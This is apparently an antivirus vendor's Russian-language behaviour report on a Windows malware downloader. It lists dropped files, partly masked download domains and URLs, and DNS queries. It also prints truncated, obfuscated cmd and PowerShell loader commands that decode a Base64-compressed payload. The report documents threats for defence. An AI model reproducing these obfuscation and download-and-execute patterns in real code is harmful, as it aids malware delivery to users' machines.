Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\Cmd /c "sET qOuG= .( $SHEllId[1]+$ShelliD[13]+'X') ( neW-ObjECt sYStem.Io.StrEAmReaDER( ( neW-ObjECt IO.comPreSSION.DeflatestReaM([io.meMOrYstReam] [SYstEM.converT]::FRomBase64...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\61.exe
Удаляет следующие файлы
- %TEMP%\61.exe
Сетевая активность
Подключается к
- 'se###exico.com':80
- 'bu#####t-masszazs.hu':80
- 'ta###-anapa.ru':80
- 'ta###-anapa.ru':443
TCP
Запросы HTTP GET
- http://www.se###exico.com/12vRC
- http://bu#####t-masszazs.hu/MFX
- http://ta###-anapa.ru/rV
Другие
- 'ta###-anapa.ru':443
UDP
- DNS ASK se###exico.com
- DNS ASK bu#####t-masszazs.hu
- DNS ASK al#####inchargha.com
- DNS ASK br###wester.com
- DNS ASK ta###-anapa.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\Cmd /c "sET qOuG= .( $SHEllId[1]+$ShelliD[13]+'X') ( neW-ObjECt sYStem.Io.StrEAmReaDER( ( neW-ObjECt IO.comPreSSION.DeflatestReaM([io.meMOrYstReam] [SYstEM.converT]::FRomBase64...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &('Sv' ) (\"AN\" + \"xh\") ( [TypE](\"{1}{2}{0}\" -f 'nt','enVirONm','e' ) ) ; . ( ([strING]${vE`Rb`OsePRe`FErenCE} )[1,3] + 'x'-jOin'')( ( ( .( \"{0}{1}{2}\"-f 'g','et-vAri','aB...
